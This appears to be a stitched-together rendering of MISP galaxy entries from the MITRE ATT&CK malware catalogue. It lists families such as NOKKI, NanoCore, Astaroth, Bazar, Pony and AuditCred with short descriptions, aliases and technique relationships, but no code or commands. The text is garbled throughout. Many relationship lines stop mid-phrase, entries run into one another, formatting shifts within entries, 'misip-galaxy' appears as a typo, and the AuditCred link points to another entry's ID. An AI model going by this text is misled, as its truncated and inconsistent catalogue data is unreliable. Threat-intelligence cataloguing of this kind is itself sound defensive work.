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<td><a href="https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/">https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/</a></td>
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<td><a href="https://securelist.com/shedding-skin-turlas-fresh-faces/88069/">https://securelist.com/shedding-skin-turlas-fresh-faces/88069/</a></td>
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</table>

**NOKKI - S0353**

[NOKKI](https://attack.mitre.org/software/S0353) is a modular remote access tool. The earliest observed attack using [NOKKI](https://attack.mitre.org/software/S0353) was in January 2018. [NOKKI](https://attack.mitre.org/software/S0353) has significant code overlap with the [KONNI](https://attack.mitre.org/software/S0356) malware family. There is some evidence potentially linking [NOKKI](https://attack.mitre.org/software/S0353) to [APT37](https://attack.mitre.org/groups/G0067). (Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)

The tag is: `misp-galaxy:mitre-malware="NOKKI - S0353"`

NOKKI - S0353 is also known as:

- NOKKI

NOKKI - S0353 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 4791. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0353">https://attack.mitre.org/software/S0353</a></td>
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</table>

**NanoCore - S0336**

[NanoCore](https://attack.mitre.org/software/S0336) is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. It has been used by threat actors since 2013.(Citation: DigiTrust NanoCore Jan 2017)(Citation: Cofense NanoCore Mar 2018)(Citation:
The tag is: misp-galaxy:mitre-malware="NanoCore - S0336"

NanoCore - S0336 is also known as:

- NanoCore

NanoCore - S0336 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

*Table 4792. Table References*

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<td><a href="https://attack.mitre.org/software/S0336">https://attack.mitre.org/software/S0336</a></td>
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<td><a href="https://www.digitrustgroup.com/nanocore-not-your-average-rat/">https://www.digitrustgroup.com/nanocore-not-your-average-rat/</a></td>
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</table>
Astaroth - S0373

[Astaroth](https://attack.mitre.org/software/S0373) is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America. It has been known publicly since at least late 2017. (Citation: Cybereason Astaroth Feb 2019)(Citation: Cofense Astaroth Sept 2018)(Citation: Securelist Brazilian Banking Malware July 2020)

The tag is: `misp-galaxy:mitre-malware="Astaroth - S0373"`

Astaroth - S0373 is also known as:

- Astaroth
- Guildma

Astaroth - S0373 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-
BadPatch - S0337

[BadPatch](https://attack.mitre.org/software/S0337) is a Windows Trojan that was used in a Gaza Hackers-linked campaign. (Citation: Unit 42 BadPatch Oct 2017)

The tag is: `misp-galaxy:mitre-malware="BadPatch - S0337"`

BadPatch - S0337 is also known as:

- BadPatch

BadPatch - S0337 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Screen Capture - T1113"` with estimative-
FlawedGrace - S0383

[FlawedGrace](https://attack.mitre.org/software/S0383) is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017. (Citation: Proofpoint TA505 Jan 2019)

The tag is: `misp-galaxy:mitre-malware="FlawedGrace - S0383"`

FlawedGrace - S0383 is also known as:

- FlawedGrace

FlawedGrace - S0383 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"` with estimative-language:likelihood-probability="almost-certain"
Micropsia - S0339

[Micropsia](https://attack.mitre.org/software/S0339) is a remote access tool written in Delphi.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)

The tag is: *misp-galaxy:mitre-malware="Micropsia - S0339"

Micropsia - S0339 is also known as:

- Micropsia

Micropsia - S0339 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-
PowerStallion - S0393

PowerStallion - S0393 is a lightweight [PowerShell](https://attack.mitre.org/techniques/T1059/001) backdoor used by [Turla](https://attack.mitre.org/groups/G0010), possibly as a recovery access tool to install other backdoors.(Citation: ESET Turla PowerShell May 2019)

The tag is: **misp-galaxy:mitre-malware="PowerStallion - S0393"**

PowerStallion - S0393 is also known as:

- PowerStallion

PowerStallion - S0393 has relationships with:

- uses: **misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"**
- uses: **misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"**
MESSAGETAP - S0443

[MESSAGETAP](https://attack.mitre.org/software/S0443) is a data mining malware family deployed by [APT41](https://attack.mitre.org/groups/G0096) into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords. (Citation: FireEye MESSAGETAP October 2019)

The tag is: *misp-galaxy:mitre-malware="MESSAGETAP - S0443"

MESSAGETAP - S0443 is also known as:

- MESSAGETAP

MESSAGETAP - S0443 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0443">attack.mitre.org/software/S0443</a></td>
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Azorult - S0344

[Azorult](https://attack.mitre.org/software/S0344) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://attack.mitre.org/software/S0344) has been observed in the wild as early as 2016. In July 2018, [Azorult](https://attack.mitre.org/software/S0344) was seen used in a spearphishing campaign against targets in North America.
Azorult has been seen used for cryptocurrency theft. (Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)

The tag is: misp-galaxy:mitre-malware="Azorult - S0344"

Azorult - S0344 is also known as:

- Azorult

Azorult - S0344 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
## PLEAD - S0435

[PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong. (Citation: TrendMicro BlackTech June 2017) (Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two. (Citation: JPCert TSCookie March 2018) (Citation: JPCert PLEAD Downloader June 2018)

The tag is: *misp-galaxy:mitre-malware="PLEAD - S0435"*

PLEAD - S0435 is also known as:

- PLEAD

PLEAD - S0435 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555"* with estimative-language:likelihood-probability="almost-certain"
Bazar - S0534

[Bazar](https://attack.mitre.org/software/S0534) is a downloader and backdoor malware in use since at least April 2020, with infections mainly targeting professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. [Bazar](https://attack.mitre.org/software/S0534) has been reported to have ties to [TrickBot](https://attack.mitre.org/software/S0266) campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.(Citation: Cybereason Bazar July 2020)

The tag is: `misp-galaxy:mitre-malware="Bazar - S0534"`

Bazar - S0534 is also known as:

- Bazar
- KEGTAP
- Team9

Bazar - S0534 has relationships with:

- `misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001"` with estimative-language:likelihood-probability="almost-certain"
- `misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-
Table 4801. Table References

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<td><a href="https://attack.mitre.org/software/S0534">https://attack.mitre.org/software/S0534</a></td>
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<td><a href="https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles">https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles</a></td>
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<tr>
<td><a href="https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/">https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/</a></td>
</tr>
</tbody>
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Denis - S0354

[Denis](https://attack.mitre.org/software/S0354) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050). [Denis](https://attack.mitre.org/software/S0354) shares several similarities to the [SOUNDBITE](https://attack.mitre.org/software/S0157) backdoor and has been used in conjunction with the [Goopy](https://attack.mitre.org/software/S0477) backdoor. (Citation: Cybereason Oceanlotus May 2017)

The tag is: *misip-galaxy:mitre-malware="Denis - S0354"*

Denis - S0354 is also known as:

- Denis

Denis - S0354 has relationships with:

- uses: misip-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misip-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

Table 4802. Table References

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<tr>
<th>Links</th>
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<tr>
<td><a href="https://attack.mitre.org/software/S0354">https://attack.mitre.org/software/S0354</a></td>
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<tr>
<td><a href="https://www.cybereason.com/blog/operation-cobalt-kitty-apt">https://www.cybereason.com/blog/operation-cobalt-kitty-apt</a></td>
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</table>
Pony - S0453

Pony - S0453 is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.(Citation: Malwarebytes Pony April 2016)

The tag is: `misp-galaxy:mitre-malware="Pony - S0453"`

Pony - S0453 is also known as:

- Pony

Pony - S0453 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Account - T1087.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003"` with estimative-language:likelihood-probability="almost-certain"
Seasalt - S0345

[Seasalt](https://attack.mitre.org/software/S0345) is malware that has been linked to [APT1](https://attack.mitre.org/groups/G0006)'s 2010 operations. It shares some code similarities with [OceanSalt](https://attack.mitre.org/software/S0346). (Citation: Mandiant APT1 Appendix)(Citation: McAfee Oceansalt Oct 2018)

The tag is: `misp-galaxy:mitre-malware="Seasalt - S0345"`

Seasalt - S0345 is also known as:

- Seasalt

Seasalt - S0345 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0345">https://attack.mitre.org/software/S0345</a></td>
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<td><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip</a></td>
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Spark - S0543

[Spark](https://attack.mitre.org/software/S0543) is a Windows backdoor and has been in use since as early as 2017.(Citation: Unit42 Molerat Mar 2020)

The tag is: *misp-galaxy:mitre-malware="Spark - S0543"

Spark - S0543 is also known as:

• Spark

Spark - S0543 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="User Activity Based Checks - T1497.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

Table 4805. Table References

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INSOMNIA - S0463

[INSOMNIA](https://attack.mitre.org/software/S0463) is spyware that has been used by the group Evil Eye.(Citation: Volexity Insomnia)

The tag is: `misp-galaxy:mitre-malware="INSOMNIA - S0463"`

INSOMNIA - S0463 is also known as:

- INSOMNIA

INSOMNIA - S0463 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1456"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1533"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Application Discovery - T1418"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1509"` with estimative-language:likelihood-probability="almost-certain"
TSCookie - S0436

[TSCookie](https://attack.mitre.org/software/S0436) is a remote access tool (RAT) that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) in campaigns against Japanese targets. (Citation: JPCert TSCookie March 2018)(Citation: JPCert BlackTech Malware September 2019). [TSCookie](https://attack.mitre.org/software/S0436) has been referred to as [PLEAD](https://attack.mitre.org/software/S0435) though more recent reporting indicates a separation between the two. (Citation: JPCert PLEAD Downloader June 2018)(Citation: JPCert BlackTech Malware September 2019)

The tag is: *misp-galaxy:mitre-malware*="TSCookie - S0436"

TSCookie - S0436 is also known as:

- TSCookie

TSCookie - S0436 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern*="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern*="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern*="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
OceanSalt - S0346

[OceanSalt](https://attack.mitre.org/software/S0346) is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. [OceanSalt](https://attack.mitre.org/software/S0346) shares code similarity with [SpyNote RAT](https://attack.mitre.org/software/S0305), which has been linked to [APT1](https://attack.mitre.org/groups/G0006).(Citation: McAfee Oceansalt Oct 2018)

The tag is: `misp-galaxy:mitre-malware="OceanSalt - S0346"`

OceanSalt - S0346 is also known as:

- OceanSalt

OceanSalt - S0346 has relationships with:


- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"` with estimative-
AuditCred - S0347

[AuditCred](https://attack.mitre.org/software/S0346) is a malicious DLL that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) during their 2018 attacks.(Citation: TrendMicro Lazarus Nov 2018)

The tag is: *misp-galaxy:mitre-malware="AuditCred - S0347"*

AuditCred - S0347 is also known as:

- AuditCred
- Roptimizer

AuditCred - S0347 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-
Avenger - S0473

